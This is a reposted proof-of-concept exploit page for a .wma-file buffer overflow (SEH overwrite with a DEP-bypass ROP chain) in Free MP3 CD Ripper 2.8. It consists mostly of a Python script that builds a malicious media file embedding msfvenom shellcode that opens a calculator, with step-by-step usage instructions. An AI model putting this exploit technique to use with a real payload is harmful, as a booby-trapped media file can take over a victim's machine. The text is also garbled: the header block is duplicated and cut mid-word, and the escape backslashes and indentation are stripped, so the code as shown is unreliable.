Free MP3 CD Ripper 2.8 .wma Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 304

# Exploit Title: Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-10-08
# Exploit Author: Matteo Malvica
# Vendor: Cleanersoft Software
# Sof # Exploit Title: Free MP3 CD Ripper 2.8 - '.wma' Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-10-08
# Exploit Author: Matteo Malvica
# Vendor: Cleanersoft Software
# Software Link: http://www.commentcamarche.net/download/telecharger-34082200-free-mp3-cd-ripper
# Tested Version: 2.8
# Tested on OS: Windows 7 - 64bit
# Modified SEH Exploit https://www.exploit-db.com/exploits/45412/
# CVE : N/A
#
# Steps:
# 0. Turn DEP on and reboot
# I Run the python script, it will create a new file with the name "exploit.wma".
# II Start the program and click on "Convert".
# III Load the file "exploit.wma"
# IV A shiny calculator will pop-up on your desktop

#!/usr/bin/python
import struct

# msfvenom -p windows/exec CMD=calc.exe -b 'x00x0ax0dx2f' -f python
shellcode = ""
shellcode += "xdbxdexd9x74x24xf4x58x2bxc9xb1x31xbaxef"
shellcode += "xc3xbdx59x83xc0x04x31x50x14x03x50xfbx21"
shellcode += "x48xa5xebx24xb3x56xebx48x3dxb3xdax48x59"
shellcode += "xb7x4cx79x29x95x60xf2x7fx0exf3x76xa8x21"
shellcode += "xb4x3dx8ex0cx45x6dxf2x0fxc5x6cx27xf0xf4"
shellcode += "xbex3axf1x31xa2xb7xa3xeaxa8x6ax54x9fxe5"
shellcode += "xb6xdfxd3xe8xbex3cxa3x0bxeex92xb8x55x30"
shellcode += "x14x6dxeex79x0ex72xcbx30xa5x40xa7xc2x6f"
shellcode += "x99x48x68x4ex16xbbx70x96x90x24x07xeexe3"
shellcode += "xd9x10x35x9ex05x94xaex38xcdx0ex0bxb9x02"
shellcode += "xc8xd8xb5xefx9ex87xd9xeex73xbcxe5x7bx72"
shellcode += "x13x6cx3fx51xb7x35x9bxf8xeex93x4ax04xf0"
shellcode += "x7cx32xa0x7ax90x27xd9x20xfexb6x6fx5fx4c"
shellcode += "xb8x6fx60xe0xd1x5exebx6fxa5x5ex3exd4x59"
shellcode += "x15x63x7cxf2xf0xf1x3dx9fx02x2cx01xa6x80"
shellcode += "xc5xf9x5dx98xafxfcx1ax1ex43x8cx33xcbx63"
shellcode += "x23x33xdex07xa2xa7x82xe9x41x40x20xf6"

def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x00487219, # POP EDX # RETN [fcrip.exe]
0x004e9208, # ptr to &VirtualAlloc() [IAT fcrip.exe]
0x10007089, # MOV EAX,DWORD PTR DS:[EDX] # RETN [libFLAC.dll]
0x0040508e, # XCHG EAX,ESI # RETN [fcrip.exe]
0x004d9e5c, # POP EBP # RETN [fcrip.exe]
0x1000c5ce, # & push esp # ret [libFLAC.dll]
0x00445aff, # POP EBX # RETN [fcrip.exe]
0x00000001, # 0x00000001-> ebx
0x00494012, # POP EDX # RETN [fcrip.exe]
0x00001000, # 0x00001000-> edx
0x004c2d76, # POP ECX # RETN [fcrip.exe]
0x00000040, # 0x00000040-> ecx
0x00409aa4, # POP EDI # RETN [fcrip.exe]
0x00412557, # RETN (ROP NOP) [fcrip.exe]
0x639d1575, # POP EAX # RETN [vorbis.dll]
0x90909090, # nop
0x00493619, # PUSHAD # RETN [fcrip.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
nop_block = 'x90' * 8
total_buffer = 4444
offset = "A" * 3804
SEH = struct.pack('<L',0x639d2ad8) # 0x639d2ad8 # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] **
padding = "B" * (total_buffer - len(SEH) - len(offset))

payload = offset + nop_block + rop_chain + nop_block * 2 + shellcode + "xCC" * 4 + SEH + padding

try:
f=open("exploit.wma","w")
print "[+] Creating %s bytes of tiramisA1 payload..." %len(payload)
f.write(payload)
f.close()
print "[+] High carb exploit created!"
except:
print "Dessert cannot be created"